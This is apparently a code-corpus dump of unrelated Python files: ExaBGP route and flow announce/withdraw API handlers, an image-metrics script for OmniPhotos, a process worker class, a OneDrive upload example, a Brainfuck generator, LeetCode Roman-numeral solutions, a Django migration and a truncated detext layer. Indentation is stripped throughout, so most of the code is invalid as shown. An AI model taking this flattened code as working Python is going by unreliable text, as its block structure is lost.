from exabgp.protocol.ip import NoNextHop
from exabgp.bgp.message import OUT
from exabgp.bgp.message.update.attribute import NextHop
from exabgp.configuration.static import ParseStaticRoute
def register_announce():
pass
@Command.register('text', 'announce route')
def announce_route(self, reactor, service, line):
def callback():
try:
descriptions, command = extract_neighbors(line)
peers = match_neighbors(reactor.peers(), descriptions)
if not peers:
self.log_failure('no neighbor matching the command : %s' % command)
reactor.processes.answer_error(service)
yield True
return
changes = self.api_route(command)
if not changes:
self.log_failure('command could not parse route in : %s' % command)
reactor.processes.answer_error(service)
yield True
return
for change in changes:
if not ParseStaticRoute.check(change):
self.log_message(
'invalid route for %s : %s' % (', '.join(peers) if peers else 'all peers', change.extensive())
)
continue
change.nlri.action = OUT.ANNOUNCE
reactor.configuration.inject_change(peers, change)
self.log_message(
'route added to %s : %s' % (', '.join(peers) if peers else 'all peers', change.extensive())
)
yield False
reactor.processes.answer_done(service)
except ValueError:
self.log_failure('issue parsing the route')
reactor.processes.answer_error(service)
yield True
except IndexError:
self.log_failure('issue parsing the route')
reactor.processes.answer_error(service)
yield True
reactor.asynchronous.schedule(service, line, callback())
return True
@Command.register('text', 'withdraw route')
def withdraw_route(self, reactor, service, line):
def callback():
try:
descriptions, command = extract_neighbors(line)
peers = match_neighbors(reactor.peers(), descriptions)
if not peers:
self.log_failure('no neighbor matching the command : %s' % command)
reactor.processes.answer_error(service)
yield True
return
changes = self.api_route(command)
if not changes:
self.log_failure('command could not parse route in : %s' % command)
reactor.processes.answer_error(service)
yield True
return
for change in changes:
# Change the action to withdraw before checking the route
change.nlri.action = OUT.WITHDRAW
                # NextHop is a mandatory field (but we do not require it)
if change.nlri.nexthop is NoNextHop:
change.nlri.nexthop = NextHop('0.0.0.0')
if not ParseStaticRoute.check(change):
self.log_message(
'invalid route for %s : %s' % (', '.join(peers) if peers else 'all peers', change.extensive())
)
continue
if reactor.configuration.inject_change(peers, change):
self.log_message(
'route removed from %s : %s' % (', '.join(peers) if peers else 'all peers', change.extensive())
)
yield False
else:
self.log_failure(
'route not found on %s : %s' % (', '.join(peers) if peers else 'all peers', change.extensive())
)
yield False
reactor.processes.answer_done(service)
except ValueError:
self.log_failure('issue parsing the route')
reactor.processes.answer_error(service)
yield True
except IndexError:
self.log_failure('issue parsing the route')
reactor.processes.answer_error(service)
yield True
reactor.asynchronous.schedule(service, line, callback())
return True
@Command.register('text', 'announce vpls')
def announce_vpls(self, reactor, service, line):
def callback():
try:
descriptions, command = extract_neighbors(line)
peers = match_neighbors(reactor.peers(), descriptions)
if not peers:
self.log_failure('no neighbor matching the command : %s' % command)
reactor.processes.answer_error(service)
yield True
return
changes = self.api_vpls(command)
if not changes:
self.log_failure('command could not parse vpls in : %s' % command)
reactor.processes.answer_error(service)
yield True
return
for change in changes:
change.nlri.action = OUT.ANNOUNCE
reactor.configuration.inject_change(peers, change)
self.log_message(
'vpls added to %s : %s' % (', '.join(peers) if peers else 'all peers', change.extensive())
)
yield False
reactor.processes.answer_done(service)
except ValueError:
self.log_failure('issue parsing the vpls')
reactor.processes.answer_error(service)
yield True
except IndexError:
self.log_failure('issue parsing the vpls')
reactor.processes.answer_error(service)
yield True
reactor.asynchronous.schedule(service, line, callback())
return True
@Command.register('text', 'withdraw vpls')
def withdraw_vpls(self, reactor, service, line):
def callback():
try:
descriptions, command = extract_neighbors(line)
peers = match_neighbors(reactor.peers(), descriptions)
if not peers:
self.log_failure('no neighbor matching the command : %s' % command)
reactor.processes.answer_error(service)
yield True
return
changes = self.api_vpls(command)
if not changes:
self.log_failure('command could not parse vpls in : %s' % command)
reactor.processes.answer_error(service)
yield True
return
for change in changes:
change.nlri.action = OUT.WITHDRAW
if reactor.configuration.inject_change(peers, change):
self.log_message(
'vpls removed from %s : %s' % (', '.join(peers) if peers else 'all peers', change.extensive())
)
yield False
else:
self.log_failure(
'vpls not found on %s : %s' % (', '.join(peers) if peers else 'all peers', change.extensive())
)
yield False
reactor.processes.answer_done(service)
except ValueError:
self.log_failure('issue parsing the vpls')
reactor.processes.answer_error(service)
yield True
except IndexError:
self.log_failure('issue parsing the vpls')
reactor.processes.answer_error(service)
yield True
reactor.asynchronous.schedule(service, line, callback())
return True
@Command.register('text', 'announce attribute')
@Command.register('text', 'announce attributes')
def announce_attributes(self, reactor, service, line):
def callback():
try:
descriptions, command = extract_neighbors(line)
peers = match_neighbors(reactor.peers(), descriptions)
if not peers:
self.log_failure('no neighbor matching the command : %s' % command)
reactor.processes.answer_error(service)
yield True
return
changes = self.api_attributes(command, peers)
if not changes:
self.log_failure('command could not parse route in : %s' % command)
reactor.processes.answer_error(service)
yield True
return
for change in changes:
change.nlri.action = OUT.ANNOUNCE
reactor.configuration.inject_change(peers, change)
self.log_message(
'route added to %s : %s' % (', '.join(peers) if peers else 'all peers', change.extensive())
)
yield False
reactor.processes.answer_done(service)
except ValueError:
self.log_failure('issue parsing the route')
reactor.processes.answer_error(service)
yield True
except IndexError:
self.log_failure('issue parsing the route')
reactor.processes.answer_error(service)
yield True
reactor.asynchronous.schedule(service, line, callback())
return True
@Command.register('text', 'withdraw attributes')
def withdraw_attribute(self, reactor, service, line):
def callback():
try:
descriptions, command = extract_neighbors(line)
peers = match_neighbors(reactor.peers(), descriptions)
if not peers:
self.log_failure('no neighbor matching the command : %s' % command)
reactor.processes.answer_error(service)
yield True
return
changes = self.api_attributes(command, peers)
if not changes:
self.log_failure('command could not parse route in : %s' % command)
reactor.processes.answer_error(service)
yield True
return
for change in changes:
change.nlri.action = OUT.WITHDRAW
if reactor.configuration.inject_change(peers, change):
self.log_message(
'route removed from %s : %s' % (', '.join(peers) if peers else 'all peers', change.extensive())
)
yield False
else:
self.log_failure(
'route not found on %s : %s' % (', '.join(peers) if peers else 'all peers', change.extensive())
)
yield False
reactor.processes.answer_done(service)
except ValueError:
self.log_failure('issue parsing the route')
reactor.processes.answer_error(service)
yield True
except IndexError:
self.log_failure('issue parsing the route')
reactor.processes.answer_error(service)
yield True
reactor.asynchronous.schedule(service, line, callback())
return True
@Command.register('text', 'announce flow')
def announce_flow(self, reactor, service, line):
def callback():
try:
descriptions, command = extract_neighbors(line)
peers = match_neighbors(reactor.peers(), descriptions)
if not peers:
self.log_failure('no neighbor matching the command : %s' % command)
reactor.processes.answer_error(service)
yield True
return
changes = self.api_flow(command)
if not changes:
self.log_failure('command could not parse flow in : %s' % command)
reactor.processes.answer_error(service)
yield True
return
for change in changes:
change.nlri.action = OUT.ANNOUNCE
reactor.configuration.inject_change(peers, change)
self.log_message(
'flow added to %s : %s' % (', '.join(peers) if peers else 'all peers', change.extensive())
)
yield False
reactor.processes.answer_done(service)
except ValueError:
self.log_failure('issue parsing the flow')
reactor.processes.answer_error(service)
yield True
except IndexError:
self.log_failure('issue parsing the flow')
reactor.processes.answer_error(service)
yield True
reactor.asynchronous.schedule(service, line, callback())
return True
@Command.register('text', 'withdraw flow')
def withdraw_flow(self, reactor, service, line):
def callback():
try:
descriptions, command = extract_neighbors(line)
peers = match_neighbors(reactor.peers(), descriptions)
if not peers:
self.log_failure('no neighbor matching the command : %s' % command)
reactor.processes.answer_error(service)
yield True
return
changes = self.api_flow(command)
if not changes:
self.log_failure('command could not parse flow in : %s' % command)
reactor.processes.answer_error(service)
yield True
return
for change in changes:
change.nlri.action = OUT.WITHDRAW
if reactor.configuration.inject_change(peers, change):
self.log_message(
'flow removed from %s : %s' % (', '.join(peers) if peers else 'all peers', change.extensive())
)
else:
self.log_failure(
'flow not found on %s : %s' % (', '.join(peers) if peers else 'all peers', change.extensive())
)
yield False
reactor.processes.answer_done(service)
except ValueError:
self.log_failure('issue parsing the flow')
reactor.processes.answer_error(service)
yield True
except IndexError:
self.log_failure('issue parsing the flow')
reactor.processes.answer_error(service)
yield True
reactor.asynchronous.schedule(service, line, callback())
return True
@Command.register('text', 'announce eor')
def announce_eor(self, reactor, service, command):
def callback(self, command, peers):
family = self.api_eor(command)
if not family:
self.log_failure("Command could not parse eor : %s" % command)
reactor.processes.answer_error(service)
yield True
return
reactor.configuration.inject_eor(peers, family)
self.log_message(
"Sent to %s : %s"
% (', '.join(peers if peers else []) if peers is not None else 'all peers', family.extensive())
)
yield False
reactor.processes.answer_done(service)
try:
descriptions, command = extract_neighbors(command)
peers = match_neighbors(reactor.established_peers(), descriptions)
if not peers:
self.log_failure('no neighbor matching the command : %s' % command)
reactor.processes.answer_error(service)
return False
reactor.asynchronous.schedule(service, command, callback(self, command, peers))
return True
except ValueError:
self.log_failure('issue parsing the command')
reactor.processes.answer_error(service)
return False
except IndexError:
self.log_failure('issue parsing the command')
reactor.processes.answer_error(service)
return False
@Command.register('text', 'announce route-refresh')
def announce_refresh(self, reactor, service, command):
def callback(self, command, peers):
refreshes = self.api_refresh(command)
if not refreshes:
self.log_failure("Command could not parse route-refresh command : %s" % command)
reactor.processes.answer_error(service)
yield True
return
reactor.configuration.inject_refresh(peers, refreshes)
for refresh in refreshes:
self.log_message(
"Sent to %s : %s"
% (', '.join(peers if peers else []) if peers is not None else 'all peers', refresh.extensive())
)
yield False
reactor.processes.answer_done(service)
try:
descriptions, command = extract_neighbors(command)
peers = match_neighbors(reactor.established_peers(), descriptions)
if not peers:
self.log_failure('no neighbor matching the command : %s' % command)
reactor.processes.answer_error(service)
return False
reactor.asynchronous.schedule(service, command, callback(self, command, peers))
return True
except ValueError:
self.log_failure('issue parsing the command')
reactor.processes.answer_error(service)
return False
except IndexError:
self.log_failure('issue parsing the command')
reactor.processes.answer_error(service)
return False
@Command.register('text', 'announce operational')
def announce_operational(self, reactor, service, command):
def callback(self, command, peers):
operational = self.api_operational(command)
if not operational:
self.log_failure("Command could not parse operational command : %s" % command)
reactor.processes.answer_error(service)
yield True
return
reactor.configuration.inject_operational(peers, operational)
self.log_message(
"operational message sent to %s : %s"
% (', '.join(peers if peers else []) if peers is not None else 'all peers', operational.extensive())
)
yield False
reactor.processes.answer_done(service)
if (command.split() + ['be', 'safe'])[2].lower() not in (
'asm',
'adm',
'rpcq',
'rpcp',
'apcq',
'apcp',
'lpcq',
'lpcp',
):
reactor.processes.answer_done(service)
return False
try:
descriptions, command = extract_neighbors(command)
peers = match_neighbors(reactor.peers(), descriptions)
if not peers:
self.log_failure('no neighbor matching the command : %s' % command)
reactor.processes.answer_error(service)
return False
reactor.asynchronous.schedule(service, command, callback(self, command, peers))
return True
except ValueError:
self.log_failure('issue parsing the command')
reactor.processes.answer_error(service)
return False
except IndexError:
self.log_failure('issue parsing the command')
reactor.processes.answer_error(service)
return False
|
Python/compute_GT_image_metrics.py | kokizzu/OmniPhotos | 129 | 12664779 | <filename>Python/compute_GT_image_metrics.py
#!/usr/bin/env python
# coding: utf-8
# get_ipython().run_line_magic('pylab', 'inline')
import csv
from math import sqrt
import imageio
import numpy as np
import os
# import cv2
from skimage.metrics import structural_similarity
def calculate_psnr(img1, img2, max_value=255):
""""Calculating peak signal-to-noise ratio (PSNR) between two images."""
mse = np.mean((np.array(img1, dtype=np.float32) - np.array(img2, dtype=np.float32)) ** 2)
if mse == 0:
return 100
return 20 * np.log10(max_value / (np.sqrt(mse)))
# calculate_psnr(gt_img, ours_img)
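# A quick sanity check on synthetic data (a sketch, not part of the pipeline):
#     img = np.random.randint(0, 256, (64, 64, 3), dtype=np.uint8)
#     calculate_psnr(img, img)            # returns the 100 dB cap (mse == 0)
#     noisy = np.clip(img.astype(np.int32) + np.random.randint(-5, 6, img.shape), 0, 255)
#     calculate_psnr(img, noisy)          # roughly 35-40 dB for this noise level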
def calculate_ssim(img1, img2):
return structural_similarity(img1, img2, multichannel=True)
def calculate_lpips(img1, img2):
global lpips_model, use_gpu
img1 = util.im2tensor(img1)
img2 = util.im2tensor(img2)
if use_gpu:
img1 = img1.cuda()
img2 = img2.cuda()
return lpips_model.forward(img1, img2).item()
def max_shifted_metric(function, img1, img2, max_shift=1):
max_value = 0
for y_shift in range(-max_shift, max_shift + 1):
y_start = max(0, y_shift)
y_end = min(img1.shape[0], img1.shape[0] + y_shift)
for x_shift in range(-max_shift, max_shift + 1):
x_start = max(0, x_shift)
x_end = min(img1.shape[1], img1.shape[1] + x_shift)
img1_shifted = img1[y_start:y_end, x_start:x_end]
img2_cropped = img2[:img1_shifted.shape[0], :img1_shifted.shape[1]]
value = function(img1_shifted, img2_cropped)
# print(y_shift, x_shift, value)
if value > max_value:
max_value = value
return max_value
def min_shifted_metric(function, img1, img2, min_shift=1):
min_value = 1e10
for y_shift in range(-min_shift, min_shift + 1):
y_start = max(0, y_shift)
y_end = min(img1.shape[0], img1.shape[0] + y_shift)
for x_shift in range(-min_shift, min_shift + 1):
x_start = max(0, x_shift)
x_end = min(img1.shape[1], img1.shape[1] + x_shift)
img1_shifted = img1[y_start:y_end, x_start:x_end]
img2_cropped = img2[:img1_shifted.shape[0], :img1_shifted.shape[1]]
value = function(img1_shifted, img2_cropped)
# print(y_shift, x_shift, value)
if value < min_value:
min_value = value
return min_value
datasets = ['apartment_0', 'hotel_0', 'office_0', 'office_4', 'room_0', 'room_1']
cubemap_sides = 'FLRBUD'
gt_path = r"G:\OmniPhotos\Data\new\GT-Replica\{dataset}\cubmap_image\image\{dataset}_{index:04}_{side}.jpg"
output_path = r"G:\OmniPhotos\GT quantitative comparison"
# compute = ['PSNR']
# compute = ['SSIM']
compute = ['LPIPS']
# comparison = "DIS flow"
# comparison = "Fewer images (15-DIS)"
# comparison = "Fewer images (30-DIS)"
# comparison = "Fewer images (45-DIS)"
# comparison = "High-res proxy"
# comparison = "Huber-depth-sres"
# comparison = "L2-depth-sres"
# comparison = "Less smoothness"
# comparison = "Low-res proxy"
# comparison = "MegaParallax-cylinder-3m"
# comparison = "MegaParallax-plane-3m"
# comparison = "More smoothness"
# comparison = "No flow (linear blending)"
# comparison = "No normalised residuals"
# comparison = "No robust data term"
# comparison = "Optimising depth (not inverse)"
# comparison = "Our complete method"
# comparison = "Our method (GT inputs)"
# comparison = "Parallax360-cylinder-3m"
for comparison in [
"DIS flow",
"Fewer images (15-DIS)",
"Fewer images (30-DIS)",
"Fewer images (45-DIS)",
"High-res proxy",
"Huber-depth-sres",
"L2-depth-sres",
"Low-res proxy",
"MegaParallax-cylinder-3m",
"MegaParallax-plane-3m",
"No flow (linear blending)",
"No normalised residuals",
"No robust data term",
"Optimising depth (not inverse)",
"Our complete method",
"Our method (GT inputs)",
"Parallax360-cylinder-3m"
]:
ours_path = os.path.join(output_path, comparison, "{dataset}-Replica-cubemaps-{index:04}_{side}.png")
print("Computing " + (" and ".join(compute)) + f" for '{comparison}' ...")
if 'PSNR' in compute:
total_count = 0
total_psnr = 0
total_psnr_squared = 0
with open(os.path.join(output_path, comparison + " - PSNR.csv"), 'w', newline='') as csvfile:
csvwriter = csv.writer(csvfile, delimiter=',', quoting=csv.QUOTE_NONE)
csvwriter.writerow(["Dataset", "Index", "Face", "PSNR"])
for dataset in datasets:
dataset_count = 0
dataset_psnr = 0
print(dataset)
for index in range(81):
print(f" {index}.")
for side in cubemap_sides:
## Paths to images
gt_image_path = gt_path.format(**locals())
ours_image_path = ours_path.format(**locals())
## Load images
gt_img = imageio.imread(gt_image_path)
ours_img = imageio.imread(ours_image_path)
## Compute metrics
psnr = max_shifted_metric(calculate_psnr, gt_img, ours_img)
## Log result
# print(f"{dataset} -- {index:02} -- {side} -- PSNR: {psnr:.2f}")
csvwriter.writerow([dataset, index, side, psnr])
dataset_count += 1
dataset_psnr += psnr
total_psnr_squared += psnr * psnr
psnr = dataset_psnr / dataset_count
print(f'PSNR: {psnr:.2f}')
total_count += dataset_count
total_psnr += dataset_psnr
mean_psnr = total_psnr / total_count
stdev_psnr = sqrt(total_psnr_squared / total_count - pow(mean_psnr, 2))
sem_psnr = stdev_psnr / sqrt(total_count)
print(f"PSNR: {mean_psnr:.2f} +/- {sem_psnr:.2f}")
if 'SSIM' in compute:
total_count = 0
total_ssim = 0
total_ssim_squared = 0
with open(os.path.join(output_path, comparison + " - SSIM.csv"), 'w', newline='') as csvfile:
csvwriter = csv.writer(csvfile, delimiter=',', quoting=csv.QUOTE_NONE)
csvwriter.writerow(["Dataset", "Index", "Face", "SSIM"])
for dataset in datasets:
dataset_count = 0
dataset_ssim = 0
print(dataset)
for index in range(81):
print(f" {index}.")
for side in cubemap_sides:
## Paths to images
gt_image_path = gt_path.format(**locals())
ours_image_path = ours_path.format(**locals())
## Load images
gt_img = imageio.imread(gt_image_path)
ours_img = imageio.imread(ours_image_path)
## Compute metrics
ssim = max_shifted_metric(calculate_ssim, gt_img, ours_img)
## Log result
csvwriter.writerow([dataset, index, side, ssim])
dataset_count += 1
dataset_ssim += ssim
total_ssim_squared += ssim * ssim
ssim = dataset_ssim / dataset_count
print(f'SSIM: {ssim:.4f}')
total_count += dataset_count
total_ssim += dataset_ssim
mean_ssim = total_ssim / total_count
stdev_ssim = sqrt(total_ssim_squared / total_count - pow(mean_ssim, 2))
sem_ssim = stdev_ssim / sqrt(total_count)
print(f"SSIM: {mean_ssim:.4f} +/- {sem_ssim:.4f}")
if 'LPIPS' in compute:
## Help python find LPIPS-related modules
import sys
sys.path.append("LPIPS")
import LPIPS.models
from LPIPS.util import util
# Initialise the LPIPS model
use_gpu = True
lpips_model = LPIPS.models.PerceptualLoss(model='net-lin', net='alex', use_gpu=use_gpu, version='0.1')
total_count = 0
total_lpips = 0
total_lpips_squared = 0
with open(os.path.join(output_path, comparison + " - LPIPS.csv"), 'w', newline='') as csvfile:
csvwriter = csv.writer(csvfile, delimiter=',', quoting=csv.QUOTE_NONE)
csvwriter.writerow(["Dataset", "Index", "Face", "LPIPS"])
for dataset in datasets:
dataset_count = 0
dataset_lpips = 0
print(dataset)
for index in range(81):
print(f" {index}.")
for side in cubemap_sides:
## Paths to images
gt_image_path = gt_path.format(**locals())
ours_image_path = ours_path.format(**locals())
## Load images
img0 = util.load_image(gt_image_path)
img1 = util.load_image(ours_image_path)
## Compute metric
lpips = min_shifted_metric(calculate_lpips, img0, img1)
## Log result
csvwriter.writerow([dataset, index, side, lpips])
dataset_count += 1
dataset_lpips += lpips
total_lpips_squared += lpips * lpips
lpips = dataset_lpips / dataset_count
print(f'LPIPS: {lpips:.4f}')
total_count += dataset_count
total_lpips += dataset_lpips
mean_lpips = total_lpips / total_count
stdev_lpips = sqrt(total_lpips_squared / total_count - pow(mean_lpips, 2))
sem_lpips = stdev_lpips / sqrt(total_count)
print(f"LPIPS: {mean_lpips:.4f} +/- {sem_lpips:.4f}")
|
ProcessHandler/lib/workers/base.py | rfyiamcool/ProcessHandler | 101 | 12664806 | <filename>ProcessHandler/lib/workers/base.py<gh_stars>100-1000
#coding=utf-8
import os
import signal
import logging
from ProcessHandler.lib.utils import close_on_exec
from ProcessHandler.lib.sock import create_sockets
from ProcessHandler.lib.utils import _setproctitle, reopen_log_file
MAXSIZE = (1 << 31) - 1
class Worker(object):
SIGNALS = [getattr(signal, "SIG%s" % x) \
for x in "HUP QUIT INT TERM USR1 USR2 WINCH CHLD".split()]
SOCK_BACKLOG = 20
def __init__(self, cfg, file_logger, ppid, sockets=None):
self.cfg = cfg
self.file_logger = file_logger or logging.getLogger()
self.ppid = ppid
self.LISTENERS = sockets
self.alive = True
self.booted = False
self.worker_name = "worker: %s" % cfg.proc_name
self.nr = 0 # actual handle request count
self.max_requests = int(self.cfg.max_requests or MAXSIZE)
self.rd_fds = None
@property
def pid(self):
return os.getpid()
def __str__(self):
return "<Worker %s>" % self.pid
def init_signals(self):
[signal.signal(s, signal.SIG_DFL) for s in self.SIGNALS]
# init new signaling
signal.signal(signal.SIGQUIT, self.handle_quit)
signal.signal(signal.SIGTERM, self.handle_exit)
signal.signal(signal.SIGINT, self.handle_exit)
signal.signal(signal.SIGWINCH, self.handle_winch)
signal.signal(signal.SIGUSR1, self.handle_usr1)
# Don't let SIGQUIT and SIGUSR1 disturb active requests
# by interrupting system calls
if hasattr(signal, 'siginterrupt'): # python >= 2.6
signal.siginterrupt(signal.SIGQUIT, False)
signal.siginterrupt(signal.SIGUSR1, False)
def setup(self):
if self.cfg.bind:
binds = []
for b in self.cfg.bind.split(','):
addr = b.strip().split(':')
binds.append((addr[0], int(addr[1])))
self.bind = binds
# self.bind = [tuple(b.strip().split(":")) for b in self.cfg.bind.split(',')] # bind address comma separate
else:
self.bind = None
self.unix_socket = self.cfg.unix_socket
def init_process(self):
self.setup()
#set proc name
_setproctitle(self.worker_name)
self.init_signals()
# bind ip and port if needed
if not self.LISTENERS and (self.bind or self.unix_socket):
self.file_logger.info("Listern on %s, unixdomian:%s", self.cfg.bind or "", self.cfg.unix_socket or "")
self.LISTENERS = create_sockets(self.bind, self.unix_socket, self.SOCK_BACKLOG)
if self.LISTENERS:
for s in self.LISTENERS:
close_on_exec(s)
s.setblocking(0)
self.rd_fds = list(self.LISTENERS)
else:
self.rd_fds = None
# enter main loop
self.booted = True
def run(self):
self.init_process()
def handle_request(self, sock=None, client=None, addr=None):
raise NotImplementedError()
def stop(self):
self.alive = False
if self.LISTENERS:
for l in self.LISTENERS:
l.close()
def handle_quit(self, sig, frame):
self.stop()
def handle_exit(self, sig, frame):
self.alive = False
os._exit(0)
def handle_winch(self, sig, frame):
return
def handle_usr1(self, sig, frame):
reopen_log_file(self.file_logger)
def handle_usr2(self, sig, frame):
pass
"""
fds = [l.fileno() for l in self.LISTENERS]
os.environ['OPEN_FD'] = ",".join([str(fd) for fd in fds])
"""
"""
def reload(self):
# config listeners
old_bind = self.bind
old_sock = self.unix_socket
old_port = self.port
if self.port != old_port or self.bind != old_bind or self.unix_socket != old_sock: # ugly
[sock.close() for sock in self.LISTENERS]
self.LISTENERS = create_sockets(self.bind, self.port, self.unix_socket, self.backlog or 20)
"""
|
examples/onedrive/upload_file.py | rikeshtailor/Office365-REST-Python-Client | 544 | 12664808 | <filename>examples/onedrive/upload_file.py
import os
from examples import acquire_token_by_client_credentials, test_user_principal_name
from office365.graph_client import GraphClient
client = GraphClient(acquire_token_by_client_credentials)
target_drive = client.users[test_user_principal_name].drive
local_path = "../../tests/data/SharePoint User Guide.docx"
with open(local_path, 'rb') as f:
file_content = f.read()
file_name = os.path.basename(local_path)
target_file = target_drive.root.upload(file_name, file_content).execute_query()
print(f"File {target_file.web_url} has been uploaded")
|
text_to_code_brainfuck/main.py | DazEB2/SimplePyScripts | 117 | 12664817 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
def text_to_code_brainfuck(text):
commands_brainfuck = []
for c in text:
commands_brainfuck.append('+' * ord(c) + '.')
return '>'.join(commands_brainfuck)
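# A minimal sketch of the mapping: each character becomes ord(c) plus signs
# followed by '.', and consecutive cells are separated by '>':
#     text_to_code_brainfuck('A')  == '+' * 65 + '.'
#     text_to_code_brainfuck('AB') == '+' * 65 + '.' + '>' + '+' * 66 + '.'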
if __name__ == '__main__':
text = 'Hello World!'
# text = """\
# #include <iostream>
# #include <fstream>
# #include <vector>
#
# using namespace std;
#
# static char cpu[30000];
#
# int main(int argc, char **argv) {
# vector<char> acc;
# char ch;
# ifstream infile(argv[1]);
# while (infile) {
# infile.get(ch);
# acc.push_back(ch);
# }
# infile.close();
# unsigned int j = 0;
# int brc = 0;
# for (int i = 0; i < acc.size(); ++i) {
# if (acc[i] == '>')
# j++;
# if (acc[i] == '<')
# j--;
# if (acc[i] == '+')
# cpu[j]++;
# if (acc[i] == '-')
# cpu[j]--;
# if (acc[i] == '.')
# cout << cpu[j];
# if (acc[i] == ',')
# cin >> cpu[j];
# if (acc[i] == '[') {
# if (!cpu[j]) {
# ++brc;
# while (brc) {
# ++i;
# if (acc[i] == '[')
# ++brc;
# if (acc[i] == ']')
# --brc;
# }
# } else
# continue;
# } else if (acc[i] == ']') {
# if (!cpu[j])
# continue;
# else {
# if (acc[i] == ']')
# brc++;
# while (brc) {
# --i;
# if (acc[i] == '[')
# brc--;
# if (acc[i] == ']')
# brc++;
# }
# --i;
# }
# }
# }
# }
# """
code_brainfuck = text_to_code_brainfuck(text)
print('code_brainfuck:', len(code_brainfuck))
# print(code_brainfuck)
print()
# Test generated brainfuck code
import simple_brainfuck
result = simple_brainfuck.execute(code_brainfuck)
print('result:', len(result))
print(result)
assert result == text
# TODO: Compress variant
import zlib
code_brainfuck_compress = zlib.compress(code_brainfuck.encode('utf-8'))
print()
print('code_brainfuck_compress:', len(code_brainfuck_compress))
print(code_brainfuck_compress)
import base64
code_brainfuck_compress_base64 = base64.b64encode(code_brainfuck_compress).decode('utf-8')
print()
print('code_brainfuck_compress_base64:', len(code_brainfuck_compress_base64))
print(code_brainfuck_compress_base64)
with open('code.bf', mode='w', encoding='utf-8') as f:
f.write(code_brainfuck)
|
veros/diagnostics/__init__.py | AkasDutta/veros | 115 | 12664824 | <filename>veros/diagnostics/__init__.py
from veros.diagnostics.api import create_default_diagnostics, initialize, diagnose, output # noqa: F401
|
solutions/LeetCode/Python3/12.py | timxor/leetcode-journal | 854 | 12664840 | <reponame>timxor/leetcode-journal
__________________________________________________________________________________________________
56ms
class Solution:
def intToRoman(self, num: int) -> str:
res = ''
return self.toPartRom(num//1000, 'M--') + \
self.toPartRom((num % 1000)//100, 'CDM') + \
self.toPartRom((num % 100)//10, 'XLC') + \
self.toPartRom(num % 10, 'IVX')
def toPartRom(self, n : int, subs: str) -> str:
if n == 0:
return ''
if n <= 3:
return subs[0] * n
if n == 4:
return subs[0] + subs[1]
if n <= 8:
return subs[1] + subs[0]* (n - 5)
if n == 9:
return subs[0] + subs[2]
__________________________________________________________________________________________________
60ms
class Solution:
def intToRoman(self, num: int) -> str:
memo = {1000: 'M', 500: 'D',
100: 'C', 50: 'L',
10:'X', 5: 'V', 1: 'I'}
res = []
for it in [1000,100,10,1]:
##
a = num//it
num = num%it
if a == 9:
res.append(memo[it])
res.append(memo[it*10])
elif a==4:
res.append(memo[it])
res.append(memo[it*5])
elif a==5:
res.append(memo[it*5])
elif a<4:
res += [memo[it]]*a
else:
res.append(memo[it*5])
res+=[memo[it]]*(a-5)
return ''.join(res)
__________________________________________________________________________________________________
64ms
class Solution:
def intToRoman(self, num: int) -> str:
#table = {"IV" : 4, "IX" : 9, "XL" : 40, "XC" : 90, "CD" : 400, "CM" : 900, "I" : 1, "V" : 5, "X" : 10, "L" : 50, "C" : 100, "D" : 500, "M" : 1000}
table = {1 : "I", 5 : "V", 10 : "X", 50 : "L", 100 : "C", 500 : "D", 1000 : "M", 4 : "IV", 9 : "IX", 40 : "XL", 90 : "XC", 400 : "CD", 900 : "CM"}
vals = [1000, 900, 500, 400, 100, 90, 50, 40, 10, 9, 5, 4, 1]
solution = []
for v in vals:
while num - v >= 0:
num -= v
solution.append(table[v])
return ''.join(solution)
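        # Worked trace of the greedy loop above (comment added for clarity):
        #   num = 1994 -> 'M' (994 left) -> 'CM' (94 left) -> 'XC' (4 left) -> 'IV' (0 left)
        #   returns 'MCMXCIV'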
__________________________________________________________________________________________________
12352 kb
class Solution:
def intToRoman(self, num: 'int') -> 'str':
values = [1000, 900, 500, 400, 100, 90, 50, 40, 10, 9, 5, 4, 1]
symbols = ['M', 'CM', 'D', 'CD', 'C', 'XC', 'L', 'XL', 'X', 'IX', 'V', 'IV', 'I']
result = ''
for symbol, value in zip(symbols, values):
result += symbol * (num // value)
num %= value
return result
__________________________________________________________________________________________________
12392 kb
class Solution:
def intToRoman(self, num: 'int') -> 'str':
result = []
roman = {0:'', 1:'I', 2:'II', 3:'III', 4:'IV', 5:'V', 6:'VI', 7:'VII', 8:'VIII', 9:'IX', 10:'X', 20:'XX', 30:'XXX', 40:'XL', 50:'L', 60:'LX', 70:'LXX', 80:'LXXX', 90:'XC', 100:'C', 200:'CC', 300:'CCC', 400:'CD', 500:'D', 600:'DC', 700:'DCC', 800:'DCCC', 900:'CM', 1000:'M', 2000:'MM', 3000:'MMM'}
thousands = num//1000*1000
hundreds = (num-thousands)//100*100
tens = (num-thousands-hundreds)//10*10
ones = (num-thousands-hundreds-tens)
print("thousands: {}".format(thousands), "hundreds: {}".format(hundreds),
"tens: {}".format(tens), "ones: {}".format(ones), sep='\n')
result += (roman[thousands] + roman[hundreds] + roman[tens]+ roman[ones])
return ''.join(result)
__________________________________________________________________________________________________
|
application/api/migrations/0002_auto_20190128_1515.py | cqkenuo/w12scan | 864 | 12664888 | <gh_stars>100-1000
# Generated by Django 2.1.4 on 2019-01-28 07:15
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('api', '0001_initial'),
]
operations = [
migrations.RenameModel(
old_name='W12scan_domains',
new_name='domains',
),
migrations.RenameModel(
old_name='W12scan_ips',
new_name='ips',
),
migrations.RenameModel(
old_name='W12scan_properly',
new_name='properly',
),
]
|
src/detext/layers/id_embed_layer.py | StarWang/detext | 1,229 | 12664895 | import tensorflow as tf
from detext.layers.embedding_layer import create_embedding_layer
from detext.utils.parsing_utils import InputFtrType, InternalFtrType
DEFAULT_MIN_LEN = 1
DEFAULT_MAX_LEN = 100
class IdEmbedLayer(tf.keras.layers.Layer):
""" ID embedding layer"""
def __init__(self, num_id_fields, embedding_layer_param, embedding_hub_url_for_id_ftr):
""" Initializes the layer
For more details on parameters, check args.py
"""
super(IdEmbedLayer, self).__init__()
self._num_id_fields = num_id_fields
self.min_len = DEFAULT_MIN_LEN
self.max_len = DEFAULT_MAX_LEN
self.num_cls_sep = 0
if num_id_fields:
self.embedding = create_embedding_layer(embedding_layer_param, embedding_hub_url_for_id_ftr)
self.id_ftr_size = self.embedding.num_units()
def call(self, inputs, **kwargs):
""" Applies ID embedding lookup and summation on document and user fields
:param inputs: Dict A mapping that contains the following key:
doc_id_fields: list(Tensor(dtype=string)) List of document fields. Each has shape=[batch_size, max_group_size]
